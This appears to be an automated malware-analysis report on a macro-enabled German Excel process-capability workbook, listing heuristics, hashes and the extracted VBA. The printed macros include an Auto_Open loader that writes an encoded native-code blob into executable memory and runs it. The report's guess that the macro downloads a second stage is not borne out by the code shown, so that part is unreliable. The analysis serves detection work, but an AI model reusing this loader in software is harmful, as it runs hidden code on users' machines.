MALICIOUS
Risk Score: 154
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically triggering Workbook_Open and Auto_Open events. The presence of CreateObject calls and the obfuscated script attempting to use VirtualAlloc suggests the macro is designed to execute arbitrary code, likely downloading a second-stage payload. The embedded URLs are suspicious and may be related to the payload delivery or C2 infrastructure.
Heuristics (9)

- VBA project inside OOXML (medium, 4 related findings) [OOXML_VBA]: Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
- VBA project part renamed to evade filename detection (high) [OOXML_VBA_PROJECT_RENAMED]: The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched lines in script:
    Dim drv As Object
    Set fsObj = CreateObject("Scripting.FileSystemObject")
    Set drv = fsObj.Drives("C")
- Workbook_Open macro (low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched lines in script:
    Private Sub Workbook_Open()
    ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
- Auto_Open macro (low) [OLE_VBA_AUTO]: Auto_Open macro. Matched line in script:
    Public Sub Auto_Open()
- External relationship (medium) [OOXML_EXTERNAL_REL]: External target in xl/externalLinks/_rels/externalLink1.xml.rels: /Users/Admin/Google Drive/sixsigmablackbelt/Freie Dateien/Prozessfaehigkeit-Maschinenfaehigkeit-Vorlage-Excel-kurz-20190
- External hyperlinks (2) (low) [OOXML_EXTERNAL_HYPERLINKS]: Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.sixsigmablackbelt.de/
- Hidden worksheet (veryHidden) (low) [OOXML_HIDDEN_SHEET]: Excel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - https://www.sixsigmablackbelt.de (Document hyperlink)
    - https://www.sixsigmablackbelt.de/ (Document hyperlink)
    - https://order.shareit.com/product?vendorid=200286567&productid=300977794 (OOXML external relationship)
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15533 bytes |

SHA-256 (macros.bas): d65a95d9c800f1a3a5b892e959c8f3621bbe52a3f76beaebe0f847077d94f96b

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "mAPI"
Option Explicit
'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------
Private Const OPTION_BASE As Long = 0
Private Const OPTION_FLAGS As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES As String = ""
Private Const PAGE_EXECUTE_RW As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT As Long = &H3000
Private Const MEM_RELEASE As Long = &H8000
Private Const ERR_OUT_OF_MEMORY As Long = &H7
Private Const ROOTOBJECT_SIZE As Long = &H4D948
Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object
#If VBA7 = False Then
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
Private Const VBA_VERSION As Long = 6
Private Type VCOMInitializerStruct
vtbl_QueryInterface As Long
vtbl_AddRef As Long
vtbl_Release As Long
vtbl_GetTypeInfoCount As Long
vtbl_GetTypeInfo As Long
vtbl_GetIDsOfNames As Long
vtbl_Invoke As Long
RootObjectMem As Long
HelperObject As Object
SysFreeString As Long
GetProcAddress As Long
NativeCode As String
LoaderMem As Long
IgnoreFlag As Boolean
VTablePtr As Long
Kernel32Handle As Long
RootObject As Object
ClassFactory As Object
End Type
#Else
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
Private Const VBA_VERSION As Long = 7
Private Type VCOMInitializerStruct
vtbl_QueryInterface As LongPtr
vtbl_AddRef As LongPtr
vtbl_Release As LongPtr
vtbl_GetTypeInfoCount As LongPtr
vtbl_GetTypeInfo As LongPtr
vtbl_GetIDsOfNames As LongPtr
vtbl_Invoke As LongPtr
RootObjectMem As LongPtr
HelperObject As Object
SysFreeString As LongPtr
GetProcAddress As LongPtr
NativeCode As String
LoaderMem As LongPtr
IgnoreFlag As Boolean
VTablePtr As LongPtr
Kernel32Handle As LongPtr
RootObject As Object
ClassFactory As Object
End Type
#End If
Public Sub Auto_Open()
With m_Loader
.NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$( XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8 XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"
.LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY
.RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY
.vtbl_QueryInterface = .LoaderMem
.VTablePtr = VarPtr(m_Loader)
.Kernel32Handle = GetModuleHandleA("KERNEL32")
.GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
.SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
.IgnoreFlag = TypeOf .RootObject Is VBA.Collection
Set .ClassFactory = (.RootObject)
Set .RootObject = Nothing
VirtualFree .LoaderMem, 0, MEM_RELEASE
Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
Set m_VCOMObject = .ClassFactory.GetErrEx()
End With
End Sub
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'###################################################
'Procedure
'Open module: Module Funktion_und_Lizenz
'Enter company name -> strLizenzfuer = "Roland"
'save file and close
'open file
'Run sub: Lizenz_setzen_in_Berechnungsblatt()
'Run sub: speichern_mit_Lizenz
'###################################################
'Run sub: Lizenz_setzen_in_Berechnungsblatt()
'Run sub: speichern_mit_Lizenz
'###################################################
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Sheet protection, input "4twpq30qcb"
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Sub Workbook_Open()
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
Call Lizenz
With ActiveSheet.PageSetup
.RightFooter = "&""Arial""&12" & " licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de "
'.CenterHeader = "&""Arial""&60&KE6E6E6" & Chr(10) & Chr(10) & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
End With
hdnum_anzeigen
Hinweis.Show
End Sub
Private Sub Lizenzierung()
Call Workbook_Open
Call Lizenz_setzen_in_Berechnungsblatt
Call speichern_mit_Lizenz
ThisWorkbook.Close SaveChanges:=False
End Sub
Private Sub Lizenz_setzen_in_Berechnungsblatt()
ThisWorkbook.Sheets("Berechnung").Cells(1, 1).Value = strLizenzfuer
End Sub
Private Sub speichern_mit_Lizenz()
Dim Datei As String
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template__v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template_v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd_org") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
End Sub
Public Sub Workbook_BeforeClose(Cancel As Boolean)
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
End Sub
Private Sub Workbook_BeforePrint(Cancel As Boolean)
With ActiveSheet.PageSetup
.RightFooter = "&""Arial""&12" & " licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de "
'.CenterHeader = "&""Arial""&60" & KE6E6E6 & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
End With
End Sub
Public Sub Berechnung_anzeigen()
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVisible
End Sub
Public Sub translation_anzeigen()
ThisWorkbook.Sheets("translation").Visible = xlSheetVisible
End Sub
Private Sub namen_verbergen()
For Each n In ActiveWorkbook.Names
n.Visible = False
Next n
End Sub
Private Sub namen_anzeigen()
For Each n In ActiveWorkbook.Names
n.Visible = True
Next n
End Sub
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Funktionen_und_Lizenz"
Public strLizenzfuer As String
Sub Lizenz()
strLizenzfuer = "invalid license"
End Sub
Sub hdnum_anzeigen()
Dim FestplatteID As String
FestplatteID = HDNUM()
Hinweis.textbox_FestplattenID.Value = "Hard Disk ID: " & FestplatteID
End Sub
Public Function HDNUM() As String
Dim fsObj As Object
Dim drv As Object
Set fsObj = CreateObject("Scripting.FileSystemObject")
Set drv = fsObj.Drives("C")
HDNUM = Hex(drv.serialnumber)
End Function
Attribute VB_Name = "Funktionen"
'six_a
'six_m
'six_st
'six_cmu
'six_cmo
'six_cm
'six_ck
'six_md
Public Function six_m(xi As Range) As Double
six_m = WorksheetFunction.Average(xi)
End Function
Public Function six_st(xi As Range) As Double
six_st = WorksheetFunction.StDev(xi)
End Function
Public Function six_a(xi As Range) As Double
six_a = WorksheetFunction.Count(xi)
End Function
Public Function six_cmu(Mittelwert As Double, UGW As Double, Standardabweichung As Double) As Double
six_cmu = ((Mittelwert - UGW) / (3 * Standardabweichung))
End Function
Public Function six_cmo(OGW As Double, Mittelwert As Double, Standardabweichung As Double) As Double
six_cmo = ((OGW - Mittelwert) / (3 * Standardabweichung))
End Function
Public Function six_cm(OGW As Double, UGW As Double, Standardabweichung As Double) As Double
six_cm = ((OGW - UGW) / (6 * Standardabweichung))
End Function
Public Function six_ck(cmo As Double, cmu As Double) As Double
six_ck = WorksheetFunction.Min(cmo, cmu)
End Function
Public Function six_md(cmo As Double, cmu As Double) As Double
six_md = WorksheetFunction.Min(cmo, cmu)
End Function
Attribute VB_Name = "Bereinigen"
Sub Bereinigen()
Worksheets("Berechnung").Range("b1:l4").ClearContents
Worksheets("Berechnung").Range("b1:b204").ClearContents
Worksheets("Berechnung").Range("e1:e204").ClearContents
Worksheets("Berechnung").Range("h1:h204").ClearContents
Worksheets("Berechnung").Range("k1:k204").ClearContents
Worksheets("Berechnung").Range("o5:p35").ClearContents
Worksheets("Berechnung").Range("p58:y63").ClearContents
Worksheets("Berechnung").Range("bl4:bl20").ClearContents
Worksheets("Berechnung").Range("ad3:bp4").ClearContents
End Sub
Sub Rahmen()
'
' Makro2 macro
'
'
Cells.Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
End Sub
Attribute VB_Name = "Hinweis"
Attribute VB_Base = "0{2DD6D6E0-E769-4624-BAB5-E1D5AEF9D4D7}{A8479FF1-66B3-44C3-876C-579C574CB0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_website_oeffnen_Click()
strWebsite = "https://order.shareit.com/product?vendorid=200286567&productid=300977794"
ActiveWorkbook.FollowHyperlink Address:=strWebsite, NewWindow:=True
End Sub
Private Sub Formularschliessen_Click()
Unload Me
End Sub
'Private Sub UserForm_QueryClose(Cancel As Integer, CloseMode As Integer)
'If CloseMode = vbFormControlMenu Then
' MsgBox "Dieser Hinweis schließt automatisch 30 Sekunden nach Erscheinen"
' Cancel = True
'End If
'End Sub
Private Sub TextBox2_Change()
End Sub
Attribute VB_Name = "Tabelle4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 7680 bytes |
| vbaProject_01.bin | vba-project | OOXML VBA project: xl/printerSettings.bin | 60928 bytes |

SHA-256 (vbaProject_00.bin): 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861
SHA-256 (vbaProject_01.bin): f3a3bc207d67cbd78c2df8dd2da798baac02b5194642ae1e58cbcb137fe98ba6